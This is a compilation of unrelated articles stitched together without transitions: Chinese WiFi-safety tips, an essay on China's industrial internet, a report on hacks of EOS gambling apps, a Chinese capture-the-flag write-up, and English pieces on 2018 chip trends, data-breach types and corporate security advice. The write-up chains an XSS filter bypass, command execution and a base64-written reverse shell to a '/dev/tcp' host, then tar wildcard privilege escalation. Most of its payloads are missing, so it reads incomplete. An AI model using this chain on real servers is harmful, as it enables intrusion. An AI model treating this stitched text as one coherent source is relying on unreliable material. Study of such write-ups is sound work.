◆使用支付APP时请使用运营商的4G网络，不要使用公共WiFi

■私搭WiFi热点

无线路由器有较多的安全隐患，比如，之前的WEP认证能很轻易破解。个人架设无线路由器，如果配备不当，家用最多导致蹭网或个人资料泄露，但在公司使用可能导致内网被入侵，公司机密、客户资料泄露，后果不堪设想。

◆在办公网络架设无线路由器必须经过公司批准并进行安全安装

◆认证方式使用安全的WPA2

◆建议隐藏SSID，绑定接入设备的MAC地址

◆WiFi密码必须八位数以上，包含大小写、数字和标点符号，定期修改密码

■WiFi自动连接

一些手机在搜索到不是同一个WiFi热点但名称相同的WiFi时，也会自动使用保存的密码链接，这就给黑客以可乘之机。

◆日常不用WiFi时关闭手机和笔记本的无线局域网功能，以防自动连接恶意WiFi

◆当手机和笔记本连上WiFi后，留意连接到的WiFi热点名称

■WiFi万能钥匙

【危险】

手机上的WiFi万能钥匙类的APP在安装后默认设置会自动上传你所链接的WiFi的密码。这些密码一般不会明文给出，只会在链接WiFi时自动输入，但曾曝出漏洞用一个APP能读出检测到WiFi的密码，这就可以用笔记本接入WiFi使用更强大的攻击工具了。

【提示】

建议不要使用WiFi万能钥匙类APP

如果必须使用没建议关掉自动上传密码功能

公共场合接WiFi，名称一定确认好;

无密WiFi不要连，安全支付用4G;

私搭路由要审批，安全设置莫忘记;

WiFi不用要关闭，万能钥匙请回避。

万物互联时代，蹭WiFi似乎成为了一项基本“生存技能”。但在享受WiFi带来便利了的同时，由于人们普遍缺乏WiFi上网的安全防范意识，WiFi安全已经成为各种网络陷阱、钓鱼诈骗的重灾区。WiFi风险主要有两种生成形式：

一是正常WiFi被不法分子入侵;二是不法分子建设假冒可信热点。

这类山寨WiFi一般无密码，也无认证机制，最多冒充的是三大运营商热点、知名上架默认热点以及知名路由器系统默认热线等，例如，CMCC，ChinaNet、ChinaUnicom、Starbuchs以及TPlink等。

为了缓解之前说到的安全问题，所有的无线网都需要增加基本的安全认证和加密功能，包括：1、用户身份认证，防止未经授权访问网络资源;2、数据加密以保护数据完整性和数据传输私密性;3、平时使用要注意固件升级，有漏洞的无线路由器一定发要及时打补丁升级;4、不管在手机端还是电脑端，都应安装安全软件，对于黑客常用的电鱼网站等攻击手法，安全软件可以及时拦阻提醒。

中国互联网的下一个十年已经开启，之前互联网的焦点在大洋彼岸，下一轮的互联网将聚焦在东方。

PC互联网时代，我们尾随世界的浪潮。在移动互联网时代，我们借助人口红利的自身优势，实现了商业模式的创新。现在进入到万物互联和人工智能时代，互联网将会彻底改变人与人、人与物、物与物之间的连接方式。

互联网和量子计算、生物技术会共同推动第四次工业革命，也就是我们所说的产业互联网。在可以预见的万物互联时代，核心技术的竞争将会持续发酵，谁在人工智能、大数据领域实现了关键技术的突破，谁就可以实现降维攻击。

互联网上半场基本上都在做to C的应用，通过互联网改变每个人的生活。到了下半场，有一些新的机会比较成熟，我称之为“IMABCD”。

I是IoT，就是物联网;M是Mobile，移动通信;A是AI;B是Blockchain，区块链技术;C是Cloud，云技术;D是Big Data，大数据。

这些技术都需要具体的应用场景，传统行业掌握着许多应用场景，这也是互联网企业干不掉传统行业的原因，但它又掌握了很多技术，可以利用这些技术帮助传统产业转型升级，这也是产业互联网的主流思路。

当整个互联网行业升级，安全诉求也应运而生。过去不联网，就可能不会被攻击，一旦联网，意味着虚拟空间的攻击可能会蔓延到产业里。

2017年WannaCry(一种“蠕虫式”勒索病毒)流行的时候，可能会导致一些医院无法工作，一家著名汽车制造企业的生产车间都无法工作了，因为生产线也被病毒攻击了。

产业互联网给360提供了两个机会，第一，这些to B的系统都信息化、数字化了，他们的安全谁来管。360早就从一个只提供免费杀毒、拦截骚扰电话的面向消费者的安全厂商转变成一个面对政府、国家、企业、世界，全方位提供安全服务的厂商。

第二，360也在思考如何利用IMABCD这些技术，和城市、社会、生活中的场景结合。360之前只是提供了单纯的网络安全服务，以后可以提供生活上的安全服务。

360对消防安全很感兴趣，比如在人群聚积的建筑物里安装可联网的火警烟雾传感器，以前这些传感器不联网，坏了也没人知道。同时还可以借助摄像头和大数据的分析来避免误报，比如有人拿烟熏传感器的情况。

发现有危害，就可以通知方圆1公里或者500米以内的人。火灾不是一下子烧起来的，刚烧起来没人关注，等到烧大了，很多人可能会被烟熏死。如果火刚烧起来人们就得到警报进行疏散，伤亡也会减少。

2018年，360提出大安全的概念，因为网络安全的形势变得越来越严峻，越来越多的东西依赖互联网，互联网一旦遭到攻击后果非常严重，不亚于传统军事作战。乌克兰的核电站这两年被频频攻击，伊朗的核设备也被攻击了，过去出动飞机扔炸弹才能做到的事情，现在通过网络就可以做到。过去只在虚拟世界里攻击，影响电脑数据，现在可以直接操纵，危险比原来大了很多。

网络安全技术和人工智能、大数据、车联网一样是万物互联的关键核心技术。360一直很注重安全技术方面的研发，去年我们花了24个亿，今后会继续加大在大安全领域的投入，在万物互联时代更好地守护这个世界。

2018年爆发的中兴芯片事件也在警示我们，只有把握核心技术的国家才能把握自己的命运。在万物互联时代，让我们最担忧的就是安全问题，网络安全不再仅仅是信息安全，也不仅仅是电脑查杀病毒、手机拦截诈骗电话，而是关系到国家安全、国防安全、社会安全、基础设施安全，以至于每个人的人身安全。

“筹资40亿美金、21个超级节点、百万TPS（每秒交易次数）”，聪明的BM一手打造了史上最大的ICO融资项目――EOS。曾经在主网上线前风光无限，如今却沦落为一条纯粹的博彩公链，漏洞频出的合约代码招致了黑客的频繁袭扰和攻击。

曾经豪情万丈的EOS，这些天经历了什么？为何EOS生态面临的黑客攻击事件愈加猖獗？EOS上的博彩生意做得做不得？早期入局的高进（化名）以为EOS博彩游戏是一门赚钱的生意，但是现在他放弃了。他向链得得说道，这个盘子太小了，基本无利可图。

热热闹闹的参与者

2018年6月9日，EOS公链在争议声中完成主网上线。不同于以太坊每次交易都需要高额的GAS费用，用户在EOS上不需要交易费用，就可以完成转账交易。这一“噱头”促进了开发者迅速转身到EOS平台上来。

根据PeckShield态势感知平台数据分析比较发现，EOS主网上线3个月后，日活超过ETH；上线5个月后，EOS的日活接近于ETH的9倍。

在8月底，随着EOS DApp的兴起，EOS的交易额首次超过ETH，并保持着强劲的增长速度。反观ETH，在爆款“博彩”游戏Fomo3D的催化下，ETH的交易额在7月20日拉出一波最高点。随后在经历了Fomo3D带来的短暂繁荣之后，ETH无论是从活跃度还是交易额都回落至一个地位，并且在后续几个月内没有发生明显的波动。

ETH & EOS DAPP 交易额

从交易次数方面来讲，ETH的每秒交易次数(TPS) 理论峰值是25次/秒，但是在2018年1月1日～11月22日之间，ETH的TPS平均值8.15次/秒，远远低于预期。所以ETH在TPS的限制下，Fomo3D所引起的交易额的暴增，并没有同时引发交易量的变化，ETH链上的交易量一直在低位平稳运行。

EOS之所以能在主网上线前赚足噱头，离不开其大肆宣称的“百万TPS”。要知道，中心化产品支付宝的TPS也才30万左右。安全性、稳定性和可扩展性三者不可兼得，被称为区块链不可能之三角，TPS对于网络交易速度的提升，同时也部分牺牲了区块链的安全性或稳定性。

如果EOS能够实现百万TPS，足以让区块链的扩展性能适用于任何场景。但是EOS主网运行半年以来，TPS不足4000次/秒。一位从事于公链开发的技术专家向链得得表示，3000次/秒的TPS就可以满足绝大多数的业务了。EOS作为一条弱中心化的公链，以目前的DApp应用情况来看，4000次/秒的TPS并没有成为交易的瓶颈。在同期ETH低位徘徊时，EOS的交易量大幅走高。

根据PeckShield的EOS全网生态数据显示，随着大量博彩类DApp在EOS公链开发上线，EOS的DAU(日活跃用户数量)连续突破“万”字关卡，最高接近80000。得益于博彩类游戏的吸金能力，似乎把EOS盘活了。

但是，EOS平台上复制出现的竞猜、博彩类游戏同样在复制着以太坊“受害者”角色，黑客开始频繁袭扰EOS。

黑客横行的EOS

截至11月26日，EOS公链上共发生27起DApp安全事件，损失近40万EOS，价值1000万人民币。而这种安全事件有愈演愈烈之势，黑客的攻击手段也在不断演进，并且越来越复杂。

从已统计的27起DApp安全事件的类型可以看出，受攻击的合约集中在“随机数问题”、“假EOS攻击”等问题上。简单来说，“假EOS”可理解为：黑客创建了一种基于EOS的代币，并将其命名为“EOS”，开始大量给被攻击合约账号转账假EOS代币，由于合约没有检测EOS的发行方，误把“假EOS”转账视为真的，进而按照开奖流程去分配奖金。

而随机数问题是游戏开发者遇到的最大问题，目前以太坊和EOS上的随机数都不是真随机，都存在可能被预测或者利用的问题，导致出现漏洞。

EOS DApp 安全事件列表

安全公司PeckShield安全专家施华国向链得得说道，EOS生态刚起步才不到6个月，EOS系统还在逐步完善改进，系统本身也会存在漏洞，从开发者的角度看，DApp 对于所有开发者来说都是全新的，尤其是合约使用C++语言开发，上手难度更大，更容易出现各种逻辑处理不严谨的问题。

从图中可以看到Dapp攻击手段的演进过程：7月底狼人游戏遭受溢出攻击，8月份的EOSBet出现的合约RAM吞噬问题，这两者都属于系统安全问题；到9、10月份的攻击主要是以DApp开发的最基本校验问题导致的假EOS假转帐通知攻击；而到11月份频繁出现的随机数攻击问题，随机数攻击问题都属于开发逻辑问题。

EOS随着DApp的开发逐渐升温。在10月26日，BetDice和EOSTiger的DAU（日活跃用户数量）均超过3万，而当时全网的DAU也只有6万多，也就是说两个游戏DAU之和超过了全网EOS 活跃用户数总和。“两个游戏用户一定会有大量重复，而EOS区块链生态会不会也跟互联网一样存在假量数据呢？”

据PeckShield分析后发现：50万的总用户数里，只有37%的用户是真实玩家。另外有23%的群控账号（被相同人操控的子账号）和39.82%的沉默账号（从账号创建后未主动发起过任何行为的账号）。

EOS日活对比

统计时间的最后一天两个数据对比，活跃账号DAU是3万，全部账号DAU是6万6，群控账号DAU 占了全部DAU的一大半，也就是说群控账号的DAU大于真实玩家。

施华国对链得得说道：“群控账号只影响DAU，而对DApp交易额几乎没有影响，也不会影响到交易挖矿。这也说明群控账号目前的行为还是在简单的刷DAU和小额的游戏薅羊毛上。”

EOS在11月份的时候发生一起针对于游戏项目EOS WIN的攻击事件：攻击者为了完成随机数漏洞攻击，总共用6个账号部署了6个合约并行进行攻击，1分钟内获利9000EOS，这个案例也是目前为止攻击事件里攻击手段最复杂的一起攻击事件。施华国表示，未来攻击手段会越来越复杂和多样化。

无利可图的EOS

链得得注意到，EOS近两个月的平均链上流水是1亿美元，是非常巨大的。“这里面存在大量的人在刷平台币，导致EOS上的交易流水巨大。”EOS博彩玩家高进告诉链得得，EOS公链上大部分的博彩类项目都会向玩家送平台币，正因为这样一个机制，而出现了大量“薅羊毛”的玩家，国内所有EOS日活也就6000左右，加上海外玩家总共1万人，大家是一个“你割我、我割你”的状态，最后是没有赢家的。

在EOS上转账交易与运行智能合约并不需要消耗EOS代币。但是在EOS系统当中，有三大类资源被应用程序消耗：RAM（内存）、网络带宽(Network Bandwidth)、CPU带宽（CPU Bandwidth）。

简单来说，EOS类似于安卓系统，基于EOS开发智能合约就是操作系统上面的应用。而用户在创建EOS账户时就需要购买RAM、购买宽带、购买CPU这一系列复杂的程序。RAM是在区块链上存储数据的必备资源，需要支付EOS去向系统购买。存储的数据越多，需要的RAM越多。

所以，RAM是EOS的命根子。在EOS钱包注册账户、发起交易、创建智能合约、发代币、发空投都要消耗RAM。

“激活一个EOS需要NET、CPU、RAM三大资源的消耗，换句话说，开一个EOS地址的成本是50-200元人民币，玩家的准入门槛很高。”高进向链得得吐槽，EOS博彩游戏的体验巨差无比。中心化的体验永远是比去中心化的好，玩家明明可以低成本的去玩一款博彩类游戏，为什么要选择EOS。

高进曾经想过在EOS公链上做CPU和RAM的租赁生意，但是发现整个盘面也就10万个EOS，产业太小、基本不会有业务扩展的可能性。高进讲到：“在EOS上开发博彩类DApp，就好比在北京市平谷区的一个乡镇里面开超市，没有京东和淘宝的竞争，也可以通过卖方便面赚一些钱，但是这家店是没有办法扩张的。”

不得不说，swpu的师傅们出题还是很用心的，这道题目就很不错，既有前端xss，又有后端提权，可谓是非常全面了，下面我们就简单分析一下

题目地址为: http://118.89.56.208:6324

首先打开题目，发现功能只有两个，一个是验证邮箱，另一个是管理后台，但是管理后台需要本地，那突破点就在邮箱验证了。

尝试提交邮箱，发现了代码泄露，给出了过滤方式：

于是开始尝试在email处尝试xss，经过google，发现了几种绕过，尝试了一下，发现只要使用 "poc"@qq.com 类似的方法，就可以绕过过滤，然后构造xss的payload如下：

可以收到请求.

既然有了xss，我们首先读一下admin页面源码：

js构造如下：

然后收到请求，解码如下：

在页面中，发现了疑似命令执行的页面，尝试构造请求：

很快收到了结果：

但是一直这么请求，执行命令很麻烦，不如反弹个shell

这里直接用命令弹shell是很难成功的，因为有多重编码要考虑，因此采用写sh文件，然后执行sh文件弹shell的办法：

首先使用的写文件的技巧就是，base64

这个办法能很好的绕过很多编码，同理我们只要将 /bin/bash -i > /dev/tcp/ip/port 0<&1 2>&1 编码一下，然后放到上面的命令中，就可以成功将反弹shell的命令写入到文件中。

然后执行：

就可以成功弹到shell。

我们查看了一下flag，发现我们并没有办法读取，没有权限，只有flag用户才能读。

继续翻发现了一个新目录：

进入以后，发现了一个新的web应用，看下权限：

只有backup.php 可以看，代码如下：

访问目录发现有上传和备份的功能，备份代码给出了。

既然现在我们没有办法直接读取flag，那就只能让flag用户或者高权限用户帮我们读了，看了看这个tar命令，总觉得不对，在搜索中发现利用tar来提权执行脚本的操作，具体文章戳 这里 .

正如文章中讲到，使用tar命令可以配合执行自定义脚本，那这个看似没有可控点的命令执行，就变得可以利用了：

攻击思路整理如下：

使用文章中的命令，制作恶意文件名的文件：

其中1.sh 的内容是：

只要访问backup.php ，即可成功触发漏洞，获取flag

题目做完，思路可以总结为 bypass FILTER_VALIDATE_EMAIL然后xss，攻击只有本地才能访问的local web应用，从而拿到机器shell，然后继续攻击内网web题目，使用tar提权查看flag，确实学到了不少东西，如果有别的思路可以同样交流探讨。

What surprised the industry in 2018? While business has been strong, markets are changing, product categories are shifting and clouds are forming on the horizon.

As 2018 comes to a close, most companies are pretty happy with the way everything turned out. Business has been booming, new product categories developing, and profits are meeting or beating market expectations. “2018 was indeed an exciting year for semiconductors, with growth in almost every sector and application,” notes Tom Wong, director of marketing for design IP atCadence. “According to WSTS, worldwide semiconductor revenue will hit approximately $478 billion in 2018. This is an increase of 15.9% from 2017.”

New technologies are becoming mainstream. “2018 was surprisingly surprising,” says Thomas Uhrmann, director of business development at EV Group. “It was a strong year across a wide swath of technology. Optical sensing was very strong, but that was expected. The first major products are booming in the market now. Apple’s face ID had a large impact on this market. Customers are now forming consortia right and trying to prepare for the future.”

However, the warning signs on the horizon are growing. Capital spending is slowing, inventory is rising, and a trade war with China shows no sign of abatement. All of those can be highly damaging. Nobody wants to talk publicly about those possibilities yet, but they are beginning to tilt the outlook for 2019.

Meanwhile, in 2018, artificial Intelligence (AI) is perhaps the buzzword for the year. Lauro Rizzatti, a verification consultant agrees. “Artificial intelligence,machine learning (ML) anddeep learning became the industry’s words of the year in 2018 and created intriguing areas where startups are making inroads in innovative ways. Neural network acceleration, for example, got a lift from a software stack that sits atop anFPGA, optimizing its performance and concealing the FPGA programming from the user to ease deployment.”

Nobody gets an award for having seen this trend. “We were right that AI would rapidly expand to consume all industry sectors, but this wasn’t a hard one to predict―AI is ‘the’ hot topic in technology,” says Simon Forrest, director of Connectivity & Connected Home at Imagination Technologies . “Cloud AI has certainly made strides in 2018, but many companies also used AI in name alone as a massive marketing tool. Many are not using AI in the truest sense of the word. The majority are exploiting pattern-matching algorithms alongside big data analytics, then claiming it as AI. This resulted in ‘IoT’ largely being replaced by ‘smart technology’, with that smartness implying some form of AI.”

The fall of another area also is helping. “In 2018, we saw the slowdown in bitcoin mining and its impact on the foundry and crypto SoC business,” says Wong. “But don’t worry, the industry is very resilient and is already moving to the next big thing―ML/AI SoCs. Just look at the VC activities in the U.S. and China and you will get the picture.”

The rise in development of special accelerator chips for the Cloud is also interesting. These chips defy the rules in some sense because they are being designed and built to sell services offered by the same company that is developing them.

Disappointments

But not everything was great in 2018. “It’s fair to say that augmented reality (AR) didn’t really move forward much in 2018,” says Forrest. “Mass market adoption of AR glasses depends on the need to be reasonably priced. The glasses themselves also need to be sleeker in design, while issues with battery life still need to be addressed. The potential is certainly there for AR, but its success is unfortunately tied into the success of wearable displays in general and will get thwarted somewhat in 2019 by the continued disillusionment with virtual reality (VR).”

Wong agrees. “AR/VR did not quite make it to the party. While a few high-end phones support AR/VR, most of them are still a work in progress.”

Everyone knows that mobile phones are no longer the growth leader, but 2018 was the wakeup call on that front. “I had predicted smartphone shipments would reach 1.6 billion units in 2018, compared to worldwide shipments of 1.472 billion units in 2017,” says Wong. “Unfortunately, the market was not that kind. Right now, it appears the smartphone market will close 2018 with worldwide shipments of about 1.5 billion units. I thought we would have some growth in 2018, but worldwide unit shipments were flat. This is clear confirmation that the worldwide smartphone market is saturated. Even in China, unit sales in 2018 came in below unit shipments in 2017. We also witnessed a change in ranking for top-tier suppliers and saw a strong showing by Vivo, OPPO and Xiaomi in China. All of these mid-priced Chinese smartphones have really good industrial designs and premium features. I had predicted Xiaomi would go public in 2018 with a valuation of $60 billion (USD). Well, Xiaomi did go public on the Hong Kong Stock Exchange during the summer of 2018, but at a valuation of $54 billion.”

Foundry changes

2018 brought major change to foundries, as well. “The most interesting news this year is the announcement byGlobalFoundries that they are stop development of 7nm and any advanced node after 7nm,” says Navraj Nandra, senior director of product marketing for the Solutions Group atSynopsys. “In the past there was always Intel, GF, Samsung, TSMC, with fairly well mapped out development paths. GF has said it is expensive and that they were not seeing the return.”

The industry has been talking about an increasing percentage of designs staying on older nodes.“GlobalFoundries has seen a sweet spot for their business at 14nm and 28nm/22nm, especially withFD-SOI,” adds Nandra. “They have found a niche in specialty technologies, and the mainstreamfinFET node right now is 16/14/12. GF is a substantial provider at that node. Analog and RF will become their focus. The opportunity is rich with all of the interest in IoT (edge or Industrial) that use these types of technologies. Automotive there are customers wanting 28nm, and FD-SOI is interesting here.”

Competition is heating up on older nodes, as well, as both demand and capacity continue to grow. “China is still behind in semiconductors,” says EV Group’s Uhrmann. “A lot of fabs are being built and a lot of 300mm capacity is coming online. We are seeing China acquire a lot of technologies. People are getting worried about a trade war, and so are reconsidering joint ventures. We already see a lot of our customers re-concentrating efforts back to the U.S.”

With foundries revamping old nodes, the rate at which new processes are being released is accelerating. Many of these are focused on particular industries, such asIoT or automotive. This is putting a strain on theIP industry.

“In the past you were developing one USB that covered multiple market segments or one DDR,” explains Nandra. “You now have a dedicated USB 2 for IoT and one for consumer of mobile. And if you look at how the IP is designed, even though the electrical specifications are the same, the actual layout looks different. It is no longer a certainty that if you build a piece of IP on a certain process that you will get a lot of customers.”

Data breaches happen practically every day. Personal, including financial and medical data leak to cyber criminals as well as intelligence agencies. Some notable breaches include the Equifax breach, where dozens of personal data fields were leaked, and the recent Marriott breach , where passports, credit cards and locations of people at a given time were breached.

I’ve been doing some data protection consultancy as well as working on a data protection product and decided to classify the types of data breaches and give recommendations on how they can be addressed. We don’t always get to know how exactly the breaches happen, but from what is published in news articles and post-mortems, we can have a good overview on the breach landscape.

Control over target server if an attacker is able to connect to a target server and gains full or partial control on it, they can do anything, including running SELECT * FROM ... , copying files, etc. How do attackers gain such control? In many ways, most notably RCE (remote code execution) vulnerabilities and weak admin authentication.

How to prevent it? Follow best security practices regularly update libraries and software to get security patches, do not run native commands from within the application layer, open only necessary ports (80 and 443) to the outside world, configure 2-factor authentication for administrator login. Aim at having an intrusion detection / prevention system . Encrypt your data, and make the encryption as granular as possible for the most sensitive data (e.g. for SentinelDB we utilize per-record encryption) to avoid SELECT * breaches.

SQL injections this is a rookie mistake that unfortunately still happens. It allows attackers to manipulate your SQL queries and inject custom bits in them that allows them to extract more data than they are supposed to.

How to prevent it? Use prepared statements for your queries. Never ever concatenate user input in order to construct queries. Run regular code reviews and use code inspection tools to catch such instances.

Unencrypted backups the main system may be well protected, but attackers are usually after the weak spots. Storing backups might be such if you store unencrypted backups that are accessible via weak authentication (e.g. over FTP via username/password), then someone may try to attack this weaker spot. Even if the backup is encrypted, the key can be placed alongside it, which makes the encryption practically useless.

How to prevent it? Encrypt you backups, store them in a way that’s as strongly protected as your servers (e.g. 2FA, internal-network/VPN only), and have your decryption key in a hardware security module (or equivalent, e.g. AWS KMS).

Personal data in logs another weak spot other than the backups may be your logs. They usually lie on separate servers, and are not as well guarded. That’s usually okay, since logs don’t contain personal information, but sometimes they do. I recently stumbled upon a large company’s website that had their directory structure unprotected and they kept their access logs files alongside their static resources. In addition to that, they passed personal information as GET parameters, so you could get a lot of information by just getting the access logs. Needless to say, I did a responsible disclosure and the issue was fixed, but it was a potential breach.

How to prevent it? Don’t store personal information in logs. Avoid submitting forms with a GET method. Regularly review the code to check whether personal data is not logged. Make sure your logs are stored in a way as protected as your production servers and your backups. It could be a cloud service, it could be a local installation of an open source package, but don’t overlook the security of the log collection system.

Data pushed to unprotected storage a recent Alteryx/Experian leak was just that data placed on a (somewhat) public S3 bucket was breached. If you place personal data in weakly protected public stores (AWS S3, file sharing services, FTPs), then you are waiting for trouble to happen.

How to prevent it? Don’t put personal data publicly. How to prevent that from happening always review your S3 buckets and FTP servers policies. Have internal procedures that disallow sharing personal data without protecting it with at least a password shared by a side-channel (messenger/sms).

Unrestricted API calls that’s what caused the Facebook-Cambridge Analytics issue. No matter how secure your servers are, if you expose the data through your API without access restriction, rate-limiting, fraud-detection, audit trail, then your security is no use someone will “scrape” your data through the API.

How to prevent it? Do not expose too much personal data over public or easily accessible APIs. Vet API users and inform your users whenever their data is being shared with third parties, via API or otherwise.

Internal actor all of the woes above can happen due to poor security or due to internal actors. Even if your network is well guarded, an admin can go rogue and leak the data. For many reasons, nonincluding financial. An privileged internal actor has access to perform SELECT *, can decrypt the backups, can pretend to be a trusted API partner.

How to prevent it? Good operational security. A single sentence like that may sound easy, but it’s not. I don’t have a full list of things that have to be in place to guard against internal breaches there are technical, organizational and legal measures to be taken. Have unmodifiable audit trail . Have your Intrusion prevention system (or logging solution) also detect anomalous internal behaviour. Have procedures that require two admins to work together in order to log in (e.g. split key) to the most. If the data is sensitive, do background checks on the privileged admins. And many more things that fall into the “operational security” umbrella.

Man-in-the-middle attacks MITM can be used to extract data from active users only. It works on website without HTTPS, or in case the attacker has somehow installed a wildcard certificate on the target machine (and before you say that’s too unlikely it happens way too often to be ignored). In case of a successful MITM attack, the attacker can extract all data that’s being transferred.

How to prevent it? First use HTTPS. Always. Redirect HTTP to HTTPS. Use HSTS . Use certificate pinning if you control the updates of the application (e.g. through an app store). The root certificate attack unfortunately cannot be circumvented. Sorry, just hope that your users haven’t installed such shitty software. Fortunately, this won’t lead to massive breaches, only data of active users that are being targeted may leak.

javascript injection / XSS if somehow an attacker can inject javascript into your website, they can collect data being entered. This is what happened in the recent British Airways breach . A remember a potential attack on NSW (Australia) elections, where the piwick analytics script was loaded from an external server that was vulnerable to a TLS downgrade attack which allowed an attacker to replace the script and thus interfere with the election registration website.

How to prevent it? Follow the XSS protection cheat sheet by OWASP . Don’t include scripts from dodgy third party domains. Make sure third party domains, including CDNs, have a good security level (e.g. run Qualys SSL test ).

Leaked passwords from other websites one of the issues with incorrect storage of passwords is password reuse. Even if you store passwords properly , a random online store may not and if your users use the same email and password there, an attacker may try to steal their data from your site. Not all accounts will be compromised, but the more popular your service is, the more accounts will be affected.

How to avoid it? There’s not much you can do to make other websites store passwords correctly. But you can encourage the use of pass phrases , you can encourage 2-factor authentication in case of sensitive data, or you can avoid having passwords at all and use an external OAuth/OpenID provider (this has its own issues, but they may be smaller than those of password reuse). Also have some rate-limiting in place so that a single IP (or an IP range) is not able to try and access many accounts consecutively.

Employees sending emails with unprotected excel sheets especially non-technical organizations and non-technical employees tend to just want to get their job done, so they may send large excel sheets with personal data to colleagues or partners in other companies. Then once someone’s email account or server is breached, the data gets breached as well.

How to prevent it? Have internal procedures against sending personal data in excel sheets, or at least have people zip them and send passwords through a side channel (messenger/sms). You can have an organization-wide software that scans outgoing emails for attachments with excel sheets that contain personal data and have these email blocked.

Data breaches are prevented by having good information security. And information security is hard. And it’s the right combination of security practices and security products that minimize the risk of incidents. Many organizations choose not to focus on infosec, as it’s not their core business or they estimate that the risk is worth it, viewing breaches, internal actors manipulating data and other incidents as something that can’t happen to them. Until it happens.

From a certain perspective, 2018 hasn’t been as dramatic a cybersecurity year as 2017, in that we haven’t seen as many global pandemics like WannaCry.

Related: WannaCry signals worse things to come.

Still, Ransomware, zero-day exploits, and phishing attacks, were among the biggest threats facing IT security teams this year. 2018 has not been a d ull y ear as far as breaches. The cycle of exploit to discovery to weaponization has become shorter, and unfortunately, it has become more difficult to protect the enterprise network and the various devices connected to it.

In 2017, roughly 63% of organizations experienced an attempted ransomware attack, with 22% reporting these incidents occurred on a weekly basis . We expect to wind up with close statistics for 2018.

Here are a few trends I expect will dominate cyber security in 2019.

Despite the fact that everyone is still trying to understand the new privacy landscape and perhaps because they haven’t fully grasped the new realities, everyone is paying attention. Perhaps it is our ever increasing focus on privacy in general and GDPR specifically.

Perhaps it is because more organizations will be working long hours to embrace the compliance measures that are needed to protect privacy that we won’t see a major lawsuit against a company. All we know is that we have seen an increase in companies seeking NAC solutions to keep up with all the new compliance regulations and it is very satisfying to hear that sigh of relief, when a company has implemented their solution.

Artificial Intelligence (AI) and Machine Learning (ML) are going to be implemented into the arena of practical usage in cyber security mainly for forensics and identification of culprits in cyber events. Investigating security events is costly both in terms of time and the expertise required.

Amitai

We believe that AI and ML are well positioned to help in these investigations for obvious reasons, relating to computing power and specialized programming of what to look for and the ability to learn. AI and ML enable the clustering and analysis of monumental volumes of data that would otherwise be impossible to do within a reasonable amount of time even if you had the best trained minds in the business working on the investigation.

Ransomware more targeted attacks are expected against wealthy and famous individuals.

Social networks offer a world of insights and information on almost anyone who has an account. Unfortunately, it provides a lot of details that assist cyber offenders in the monetization of attacks (due to bitcoin) and the ease of performing spear phishing attacks all will be combined for a more targeted approach.

IoT will be deployed in more business usages and scenarios. The risk will rise and eventually this will cause more issues with a few headlines of devices that were used to hack networks.

The conversation Whose job it is to protect organizations in the public and private sector?

Nationwide attacks on large businesses will bring up the discussion of who should protect a country and a business from cyber security attacks. Should the state and country be active in the defense of the private sector? In the same respect, you wouldn’t expect a bank branch to deploy anti-missile defense systems against the possibility of an offending country.

At Portnox, we will continue to innovate our network security and risk control tools to provide solutions to all, empowering our customers with valuable, holistic solutions to protect their networks.

About the essayist : Ofer Amitai is CEO of Portnox, which supplies network access control, visibility, management and policy compliance systems designed to help today’s complex networks run smoothly and securely.

(Editor’s note: This article also appeared on Portnox Point)

In this day and age of technology, we could all stand to secure our data more strongly. We’re in the age of one-click buying and complicated passwords. Our data should be more secure than ever, yet many businesses find themselves facing a cyber attack each year. Businesses both big and small are open to attack.

In fact, 58% of malware attack victims are small businesses. That means no organization is safe today. The best way to protect yourself, your employees, and your customers is to have a plan of action to secure your infrastructure. Keep reading to learn ways you can secure your own infrastructure today.

First, you need to understand the reality of the threat. Cyber hackers are a reality of today. They’re here to stay, and they’re getting more sophisticated at breaking through company firewalls. Cyber attacks aren’t just limited to big businesses. While most of the recent attacks that gain the most attention have included large companies like Target and Neiman Marcus, they’re far from the only ones facing this threat.

The best way to protect your company is to start today. This isn’t a situation where you can blissfully look away and hope for the best. Take the time to familiarize yourself with the types of cyber fraud schemes and different threats happening right now. From there, follow the tips below.

SEE ALSO: How data science can answer cybersecurity challenges

You need to protect your data like it’s gold. Know what data is your most important data, or your crown jewels, and start there. Things like bank account numbers, credit card numbers, and social security numbers all need to be protected from threat first. This starts by turning to full-disk encryption tools. Not only is this incredibly simple, but it’s a good first step.

Don’t stop there. Ensure your company computers have automatic settings so they’ll log out quickly if not in use. It only takes a few minutes of inactivity to let hackers into your network. Don’t be caught with your information out in the open.

As we said, you need to protect your data. Restricting access to only those who need to access to top information is key. While most employees are well-intentioned, they might not be equipped on the best way to keep most information protected. Use software to keep your information in the hands of the right people only. Add intuitive access rights monitoring by SolarWinds to your system to ensure you can review access rights regularly.

Along with monitoring your access, create a culture in your office of education when it comes to cybersecurity. Talk openly about your concerns with your leaders. Make sure they’re aware of the latest trends in security and the most common attacks. Teaching your team the signs of a cyber attack can go a long way to protecting your business.

Security isn’t just one person’s responsibility. It’s everyone’s responsibility, and nobody is immune. Include both management, IT, and lower-level team members in your education program. Focus on continuous education for the upper-level employees with access to more information. Cyber security isn’t one-and-done, you’ll need ongoing updates and meetings to continuously make your team aware of any changes to your infrastructure.

Finally, create rules for employees focused on safety. Set guidelines for using email, browsing social media, and mobile devices at work. You want to create a culture of “safe browsing.” Teach your employees to be skeptical of any strange links and to think of strong passwords. These tips will also help them protect their own information on a regular basis.

SEE ALSO: Why developers with cybersecurity skills will be the biggest tech heroes of 2018

Many cyber attacks don’t even involve breaches of your system. Physical electronic equipment is also stolen, and it’s an easy way for hackers to gain valuable information. It’s easy to overlook securing your equipment, but that would be a mistake. Physically lock down your computer with Kensington lock ports. Even just a small tethered cord can go a long way towards protecting your devices.

While there’s no way to 100% protect your equipment from being stolen, this is a great way to deter any potential criminals. Involve employees in keeping your equipment safe. Have everyone lock server rooms, encrypt their digital information, and use cloud computing to store information. Another benefit of cloud computing is being able to track down any devices that are stolen.

Your company requires your guidance to stay protected against attacks. Cyber attacks are becoming more and more common. They’re the new normal in our digital age, and it’s up to all of us to take steps to deter these hackers from breaching your security.

Your reputation in on the line. Take action today with the tips above to secure your company infrastructure. It’s hard to reclaim employee and customer trust after losing your information to hackers. Don’t become another news story.

A new company calledLighthouse introduced an advanced security camera that can tell the difference between a person and a petback in 2017. It was a promising, Andy Rubin-backed project that managed to raise around $20 million. Unfortunately, it sounds like not a lot of people were willing to pay $300 for a security cam, even if it's powered by advanced AI and 3D sensing, because the company is shutting down operations. CEO Alex Teichman announced the closure on its website , where he admitted that Lighthouse didn't make enough money to keep the company going.

